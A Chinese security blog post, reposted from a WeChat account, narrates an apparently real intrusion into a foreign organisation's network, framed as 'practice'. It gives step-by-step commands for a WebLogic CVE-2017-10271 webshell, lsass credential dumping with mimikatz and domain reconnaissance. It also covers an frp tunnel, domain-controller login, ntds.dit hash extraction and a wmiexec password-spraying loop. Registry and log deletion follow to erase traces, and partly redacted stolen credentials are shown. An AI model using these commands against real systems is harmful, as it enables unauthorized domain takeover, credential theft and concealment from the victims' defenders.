实战 | 某外国网站的一次内网渗透练手

admin 2022年11月21日17:05:09安全文章评论14 views2512字阅读8分22秒阅读模式

扫码领资料

获网安教程

免费&进群

实战 | 某外国网站的一次内网渗透练手
实战 | 某外国网站的一次内网渗透练手

目标

主站:
https://www.xxx.com/en/

实战 | 某外国网站的一次内网渗透练手

外围打点

通过子域名,找到分站:

https://www.xxx.com/

C段里面有一个安装Weblogic的服务器,CVE-2017-10271。

实战 | 某外国网站的一次内网渗透练手


上传webshell。

http://xxx:xxxx//wls-wsat/xxx.jsp

实战 | 某外国网站的一次内网渗透练手

内网渗透

  主机信息收集

查看当前权限。

whoami

实战 | 某外国网站的一次内网渗透练手

查看机器网卡情况。

ipconfig /all
  1. 存在域:xxx.local。

  2. 当前内网ip段:10.100.20.0/24.

查看当前机器是否出网。

ping www.google.com

实战 | 某外国网站的一次内网渗透练手

查看当前主机是否存在杀软,也是个老牌杀软ESET NOD32,国外经常用这个,这次不用CS和MSF打。

实战 | 某外国网站的一次内网渗透练手

查看当前机器安装的软件。

wmic product get name,version

不知道为什么没有回显,写入文件也没有。

查看当前机器的详细信息。

systeminfo

171个补丁。。。。。。

实战 | 某外国网站的一次内网渗透练手

抓取密码,使用Prodump+mimikatz导出lsass.exe存储的密码,获得账号密码,看样子有大哥来过,修改过注册表,不然windows server 2021抓不到明文密码,我们再搞一遍。

实战 | 某外国网站的一次内网渗透练手


实战 | 某外国网站的一次内网渗透练手

PRINCHEALTHpsvadmin:xxxxx
PSVHR-APPPRODoracle:xxxx

查看是否在域内。

net time /domain

域用户+域机器,舒服。

实战 | 某外国网站的一次内网渗透练手

查看当前机器与其它机器建立的ipc连接。

net use

实战 | 某外国网站的一次内网渗透练手

域信息收集

查看当前域管理员组,发现psvadmin为域管理员。

net group "Domain admins" /domain

实战 | 某外国网站的一次内网渗透练手

查询信任域。

nltest /domain_trusts

实战 | 某外国网站的一次内网渗透练手

  1. pxxxxxxx.local为主域。

  2. pxx.local为子域。

定位域控机器。

nltest /dclist:domainname

实战 | 某外国网站的一次内网渗透练手

其中HWC-ADSRV-P01为主域控机器,但没有找到子域的域控。

实战 | 某外国网站的一次内网渗透练手

查询主域控机器的ip地址。

ping HWC-ADSRV-P01

实战 | 某外国网站的一次内网渗透练手

通过spn查询域pxxxxxxx.local结构。

setspn -T pxxxxxxx.local -Q */* >spn.txt

实战 | 某外国网站的一次内网渗透练手

并统计域内主机数量,好家伙,3167台。

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

实战 | 某外国网站的一次内网渗透练手

spn看起来太麻烦了,所以使用ADExplorer连接域控机器并导出域结构,ADExplorerSnapshot.py转换json格式,并将其导入Bloodhound,进行可视化分析,3113台机器,4897个用户。

实战 | 某外国网站的一次内网渗透练手

Bloodhound

当前用户是psvadmin,我们的目标是域控机器的最高权限,再Bloodhound中填入开始节点为psvadmin用户和目标节点为域控机器名,它会为我们规划出一条攻击路径。

实战 | 某外国网站的一次内网渗透练手

攻击路径

我们可以看到psvadmin用户是域管理员组的一名成员,比较简单,所以直接可以登录域控机器。

  隧道搭建

Neo-reGeorg、Venom都被杀,frp不杀,很奇怪,出网使用frp反向代理搭建隧道。

实战 | 某外国网站的一次内网渗透练手

frpc

实战 | 某外国网站的一次内网渗透练手

frps

实战 | 某外国网站的一次内网渗透练手

SocksCap

  域渗透

当前为C类ip段,Ladon扫描内网存活主机。

实战 | 某外国网站的一次内网渗透练手

Ladon

隧道已经搭建好了,拥有域管理员psvadmin明文账号密码,直接远程登录主域控机器。

实战 | 某外国网站的一次内网渗透练手

mstsc

接下来就是使用NTDSUTIL拍摄ntds.dit的快照,使用NTDSDumpEx导出该域用户的全部hash即可。
最后使用wmiexec进行密码喷洒即可。

FOR /F %i in (ip.txt) do wmiexec Pxxxxxxx/psvadmin:[email protected]%i whoami

实战 | 某外国网站的一次内网渗透练手


密码喷洒


到这里这个域基本被打穿。

权限维持

由于只是练习,就不作域权限维持了,可以制作黄金票据。

痕迹清理

远程登录了主域控机器:172.21.2.2。
清理3389日志。

//删除注册表
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"//删除缓存文件cd %userprofile%documents
attrib Default.rdp -s -h
del Default.rdp

清除recent。

del /f /s /q “%userprofile%Recent*.*

最后清除在边界机器里上传的工具与脚本并清除日志。

总结

  1. 做好前期的信息收集,信息收集越好,打点也就越容易。

  2. 内网渗透不要依赖于Cobalt strike和MSF这种框架工具,多手动操作一下,可以对加深对原理的理解,掌握原理才能做到游刃有余。

  3. 多学习各种渗透姿势,不要只局限于一种渗透方式,毕竟内网的主机漏洞越来越少,即使有,成功率也不高。

  4. 不要做任何破坏性动作,注意最后的痕迹清理工作。

作者:Wangfly原文地址:https://www.hui-blog.cool/

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@

学习更多渗透技能!体验靶场实战练习

实战 | 某外国网站的一次内网渗透练手

hack视频资料及工具

实战 | 某外国网站的一次内网渗透练手

(部分展示)

往期推荐

给第一次做渗透项目的新手总结的一些感悟

「登陆页面」常见的几种渗透思路与总结!

突破口!入职安服后的经验之谈

红队渗透下的入口权限快速获取

攻防演练|红队手段之将蓝队逼到关站!

CNVD 之5000w通用产品的收集(fofa)

自动化挖掘cnvd证书脚本

Xray捡洞中的高频漏洞

实战|通过供应链一举拿下目标后台权限

实战|一次真实的域渗透拿下域控(内网渗透)

看到这里了,点个“赞”、“再看”吧

原文始发于微信公众号(白帽子左一):实战 | 某外国网站的一次内网渗透练手

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月21日17:05:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  实战 | 某外国网站的一次内网渗透练手 http://cn-sec.com/archives/1421070.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: